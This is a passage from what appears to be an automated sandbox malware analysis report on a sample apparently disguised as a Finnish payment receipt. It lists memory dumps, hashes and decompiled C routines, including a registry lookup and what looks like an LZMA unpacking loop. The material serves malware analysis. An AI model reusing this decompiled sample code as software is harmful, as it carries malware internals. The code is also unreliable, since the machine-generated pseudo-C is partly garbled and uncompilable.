                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                      • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                      • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                                                                      • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                      • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0040627E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                      				int _v8;
                                                                                                                      				long _t21;
                                                                                                                      				long _t24;
                                                                                                                      				char* _t30;
                                                                                                                      
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				_v8 = 0x800;
                                                                                                                      				_t21 = E0040621D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                      				_t30 = _a16;
                                                                                                                      				if(_t21 != 0) {
                                                                                                                      					L4:
                                                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                      				} else {
                                                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                                      					_t21 = RegCloseKey(_a20);
                                                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                      						goto L4;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t21;
                                                                                                                      			}







                                                                                                                      0x0040628c
                                                                                                                      0x0040628e
                                                                                                                      0x004062a6
                                                                                                                      0x004062ab
                                                                                                                      0x004062b0
                                                                                                                      0x004062ee
                                                                                                                      0x004062ee
                                                                                                                      0x004062b2
                                                                                                                      0x004062c4
                                                                                                                      0x004062cf
                                                                                                                      0x004062d5
                                                                                                                      0x004062e0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004062e0
                                                                                                                      0x004062f4

                                                                                                                      APIs
                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue
                                                                                                                      • String ID: Call
                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                      • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                      • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00406EEF() {
                                                                                                                      				signed int _t530;
                                                                                                                      				void _t537;
                                                                                                                      				signed int _t538;
                                                                                                                      				signed int _t539;
                                                                                                                      				unsigned short _t569;
                                                                                                                      				signed int _t579;
                                                                                                                      				signed int _t607;
                                                                                                                      				void* _t627;
                                                                                                                      				signed int _t628;
                                                                                                                      				signed int _t635;
                                                                                                                      				signed int* _t643;
                                                                                                                      				void* _t644;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					_t530 =  *(_t644 - 0x30);
                                                                                                                      					if(_t530 >= 4) {
                                                                                                                      					}
                                                                                                                      					 *(_t644 - 0x40) = 6;
                                                                                                                      					 *(_t644 - 0x7c) = 0x19;
                                                                                                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                      					while(1) {
                                                                                                                      						L145:
                                                                                                                      						 *(_t644 - 0x50) = 1;
                                                                                                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                      						while(1) {
                                                                                                                      							L149:
                                                                                                                      							if( *(_t644 - 0x48) <= 0) {
                                                                                                                      								goto L155;
                                                                                                                      							}
                                                                                                                      							L150:
                                                                                                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                      							 *(_t644 - 0x54) = _t643;
                                                                                                                      							_t569 =  *_t643;
                                                                                                                      							_t635 = _t569 & 0x0000ffff;
                                                                                                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                      							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                      								_t628 = _t627 + 1;
                                                                                                                      								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                      								 *(_t644 - 0x50) = _t628;
                                                                                                                      							} else {
                                                                                                                      								 *(_t644 - 0x10) = _t607;
                                                                                                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                      							}
                                                                                                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                      								L148:
                                                                                                                      								_t487 = _t644 - 0x48;
                                                                                                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                      								L149:
                                                                                                                      								if( *(_t644 - 0x48) <= 0) {
                                                                                                                      									goto L155;
                                                                                                                      								}
                                                                                                                      								goto L150;
                                                                                                                      							} else {
                                                                                                                      								L154:
                                                                                                                      								L146:
                                                                                                                      								if( *(_t644 - 0x6c) == 0) {
                                                                                                                      									L169:
                                                                                                                      									 *(_t644 - 0x88) = 0x18;
                                                                                                                      									L170:
                                                                                                                      									_t579 = 0x22;
                                                                                                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                      									_t539 = 0;
                                                                                                                      									L172:
                                                                                                                      									return _t539;
                                                                                                                      								}
                                                                                                                      								L147:
                                                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                      								_t484 = _t644 - 0x70;
                                                                                                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                      								goto L148;
                                                                                                                      							}
                                                                                                                      							L155:
                                                                                                                      							_t537 =  *(_t644 - 0x7c);
                                                                                                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                      							while(1) {
                                                                                                                      								L140:
                                                                                                                      								 *(_t644 - 0x88) = _t537;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t538 =  *(_t644 - 0x88);
                                                                                                                      									if(_t538 > 0x1c) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									L2:
                                                                                                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M0040735D))) {
                                                                                                                      										case 0:
                                                                                                                      											L3:
                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L4:
                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                      											_t538 =  *( *(_t644 - 0x70));
                                                                                                                      											if(_t538 > 0xe1) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											L5:
                                                                                                                      											_t542 = _t538 & 0x000000ff;
                                                                                                                      											_push(0x2d);
                                                                                                                      											asm("cdq");
                                                                                                                      											_pop(_t581);
                                                                                                                      											_push(9);
                                                                                                                      											_pop(_t582);
                                                                                                                      											_t638 = _t542 / _t581;
                                                                                                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                      											asm("cdq");
                                                                                                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                      											 *(_t644 - 0x3c) = _t633;
                                                                                                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                      												L10:
                                                                                                                      												if(_t641 == 0) {
                                                                                                                      													L12:
                                                                                                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                      													goto L15;
                                                                                                                      												} else {
                                                                                                                      													goto L11;
                                                                                                                      												}
                                                                                                                      												do {
                                                                                                                      													L11:
                                                                                                                      													_t641 = _t641 - 1;
                                                                                                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                      												} while (_t641 != 0);
                                                                                                                      												goto L12;
                                                                                                                      											}
                                                                                                                      											L6:
                                                                                                                      											if( *(_t644 - 4) != 0) {
                                                                                                                      												GlobalFree( *(_t644 - 4));
                                                                                                                      											}
                                                                                                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      											 *(_t644 - 4) = _t538;
                                                                                                                      											if(_t538 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                      												goto L10;
                                                                                                                      											}
                                                                                                                      										case 1:
                                                                                                                      											L13:
                                                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                      												L157:
                                                                                                                      												 *(_t644 - 0x88) = 1;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L14:
                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                      											_t45 = _t644 - 0x48;
                                                                                                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                      											__eflags =  *_t45;
                                                                                                                      											L15:
                                                                                                                      											if( *(_t644 - 0x48) < 4) {
                                                                                                                      												goto L13;
                                                                                                                      											}
                                                                                                                      											L16:
                                                                                                                      											_t550 =  *(_t644 - 0x40);
                                                                                                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                      												L20:
                                                                                                                      												 *(_t644 - 0x48) = 5;
                                                                                                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                      												goto L23;
                                                                                                                      											}
                                                                                                                      											L17:
                                                                                                                      											 *(_t644 - 0x74) = _t550;
                                                                                                                      											if( *(_t644 - 8) != 0) {
                                                                                                                      												GlobalFree( *(_t644 - 8));
                                                                                                                      											}
                                                                                                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                      											 *(_t644 - 8) = _t538;
                                                                                                                      											if(_t538 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												goto L20;
                                                                                                                      											}
                                                                                                                      										case 2:
                                                                                                                      											L24:
                                                                                                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                      											 *(_t644 - 0x84) = 6;
                                                                                                                      											 *(_t644 - 0x4c) = _t557;
                                                                                                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                      											goto L132;
                                                                                                                      										case 3:
                                                                                                                      											L21:
                                                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                      												L158:
                                                                                                                      												 *(_t644 - 0x88) = 3;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L22:
                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                      											_t67 = _t644 - 0x70;
                                                                                                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                      											__eflags =  *_t67;
                                                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                      											L23:
                                                                                                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                      											if( *(_t644 - 0x48) != 0) {
                                                                                                                      												goto L21;
                                                                                                                      											}
                                                                                                                      											goto L24;
                                                                                                                      										case 4:
                                                                                                                      											L133:
                                                                                                                      											_t559 =  *_t642;
                                                                                                                      											_t626 = _t559 & 0x0000ffff;
                                                                                                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                      											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                      												 *(_t644 - 0x40) = 1;
                                                                                                                      												_t560 = _t559 - (_t559 >> 5);
                                                                                                                      												__eflags = _t560;
                                                                                                                      												 *_t642 = _t560;
                                                                                                                      											} else {
                                                                                                                      												 *(_t644 - 0x10) = _t596;
                                                                                                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                      											}
                                                                                                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                      												goto L139;
                                                                                                                      											} else {
                                                                                                                      												goto L137;
                                                                                                                      											}
                                                                                                                      										case 5:
                                                                                                                      											L137:
                                                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                                                      												L168:
                                                                                                                      												 *(_t644 - 0x88) = 5;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L138:
                                                                                                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                      											L139:
                                                                                                                      											_t537 =  *(_t644 - 0x84);
                                                                                                                      											L140:
                                                                                                                      											 *(_t644 - 0x88) = _t537;
                                                                                                                      											goto L1;
                                                                                                                      										case 6:
                                                                                                                      											L25:
                                                                                                                      											__edx = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												L36:
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      												goto L132;
                                                                                                                      											}
                                                                                                                      											L26:
                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                      											__cl = 8;
                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      													__eflags =  *_t98;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                      												L35:
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												goto L61;
                                                                                                                      											} else {
                                                                                                                      												L32:
                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      													__eflags = __eax;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												goto L41;
                                                                                                                      											}
                                                                                                                      										case 7:
                                                                                                                      											L66:
                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                      												L68:
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												goto L69;
                                                                                                                      											}
                                                                                                                      											L67:
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      											goto L132;
                                                                                                                      										case 8:
                                                                                                                      											L70:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      											}
                                                                                                                      											goto L132;
                                                                                                                      										case 9:
                                                                                                                      											L73:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												goto L90;
                                                                                                                      											}
                                                                                                                      											L74:
                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											L75:
                                                                                                                      											__eax = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      											__eflags = _t259;
                                                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                      											goto L76;
                                                                                                                      										case 0xa:
                                                                                                                      											L82:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												L84:
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      												goto L132;
                                                                                                                      											}
                                                                                                                      											L83:
                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                      											goto L89;
                                                                                                                      										case 0xb:
                                                                                                                      											L85:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      											L89:
                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      											L90:
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      											goto L69;
                                                                                                                      										case 0xc:
                                                                                                                      											L99:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												L164:
                                                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L100:
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t334 = __ebp - 0x70;
                                                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t334;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                      											goto L101;
                                                                                                                      										case 0xd:
                                                                                                                      											L37:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												L159:
                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											L38:
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t122;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											L39:
                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
